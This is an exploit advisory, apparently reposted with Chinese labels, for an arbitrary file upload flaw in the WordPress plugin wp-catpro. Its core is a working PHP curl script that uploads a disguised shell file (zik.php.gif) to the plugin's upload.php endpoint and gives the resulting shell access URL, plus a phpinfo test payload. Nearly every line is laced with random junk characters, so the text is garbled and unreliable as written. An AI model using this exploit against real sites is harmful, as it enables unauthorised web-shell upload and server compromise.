Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability% T W: n' k$ T; \: n
#-----------------------------------------------------------------------1 y J, ~' _3 t% D' a
2 ]* V7 k3 w# ?6 O作者 => Zikou-16% B! C5 N" [; u; o
邮箱 => zikou16x@gmail.com
5 e8 K% R% u+ L: C& G4 m测试系统 : Windows 7 , Backtrack 5r3
* o' p: {# Q5 { v0 j" f9 S" O1 L* T下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip. Z2 F) e. R, m1 |5 Q
####0 R4 }3 C1 e6 Y# Y, d* a
1 U8 W7 g" k$ y; l. ~0 ^
#=> Exploit 信息:: F4 s; |& \3 T5 N" B: {" I
------------------4 V& ~2 m3 v7 S% \
# 攻击者可以上传 file/shell.php.gif9 Q Q! L- u! n$ t, E7 z
# ("jpg", "gif", "png") // Allowed file extensions
# @0 L& _7 P t# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# m& x8 b$ |, G6 ?# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format) J! f5 l$ f) C, P4 U$ O
------------------& |3 }3 ^ s+ }& a/ X/ P1 p) X2 c
/ H7 D1 c9 B9 Y* F! X n
#=> Exploit
/ y4 S5 P) A$ c-----------) }- R6 e% Y K7 v9 t7 g0 y* Q
<?php
) J$ X) y) }- `9 [' s' X6 E' ? / Y9 ?# L# o, c: I+ O
$uploadfile="zik.php.gif";
2 v b& B5 X) M( \1 s8 s9 D$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
* a0 R" k7 t6 k# pcurl_setopt($ch, CURLOPT_POST, true);+ A/ ^) W/ }; Q9 t
curl_setopt($ch, CURLOPT_POSTFIELDS,
/ L. E' Y/ D5 @2 T7 T& Rarray('Filedata'=>"@$uploadfile",( x7 T$ D) @7 }; |8 w
'folder'=>'/wp-content/uploads/catpro/'));
& }( E$ G+ T! r; p) s7 I: x0 a3 Vcurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$ @% B, M9 G1 q8 C$postResult = curl_exec($ch);% e% ~/ u5 k3 c( {1 J4 Q6 m* K3 k
curl_close($ch);
8 V+ g9 y0 f- O& x( D8 [ 6 d2 N# X; i1 z8 Y, F
print "$postResult";
P% w% p. o& I4 \$ d n
3 x- d" b1 v4 Y' l* a' Q3 LShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
* b# A m! P5 _ ?>
4 o. F" y9 c8 w( v* K! J5 o" _' J<?php
6 P, y1 I9 ~( R _( nphpinfo();. Z. ?4 V& X/ a6 {" Q- T8 Q
?> |